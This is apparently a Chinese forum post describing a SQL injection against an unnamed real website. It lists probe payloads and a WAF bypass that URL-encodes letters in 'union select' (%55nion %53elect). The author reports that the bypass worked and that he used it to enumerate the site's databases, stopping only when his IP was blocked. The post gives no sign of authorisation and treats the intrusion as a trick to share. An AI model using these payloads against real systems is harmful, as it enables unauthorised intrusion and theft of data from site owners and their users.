某网站的sql注入绕过的小手法

无名

mucn又来分享了 这网站早就记在我的小本子里了[滑稽]
刚刚测试了一下 发现存在注入。 但存在拦截。
然后我在这儿给大家分享一个小绕过方法。
因为刚刚电脑因为多次访问ip被拦截了（如图一） 然后手机搞非常不方便 所以我这里就只分享下怎么绕过哦。

说下前面的几步小操作
and 1=1 （页面正常不拦截）
and 1=2 （页面不正常不拦截）
order by 2 （字段为2 不拦截）

and 1=2 union select 1,2 (拦截)
and 1=2 union （拦截）-这里就判断出waf对union是存在过滤的
and 1=2 select  （拦截）-同上 waf对select也存在拦截

然后思考绕过 首先改大小写
and 1=2 UnioN sEleCT （拦截）

接着思考其他绕过手法（对字母U和S进行编码）
and 1=2 %55nion %53elect 1,2 (不拦截 页面爆出字段)如图二

接着通过爆出字段进行一些信息查询 如图三

然后爆库 如图4(就两个库 一个内置库 一个当前使用库)这里要是爆表的话肯定是选择当前使用库进行查表(可惜还没爆表就ip就被拦了 后续等我ip不被拦的时候再考虑要不要继续更下去吧[滑稽][心碎] )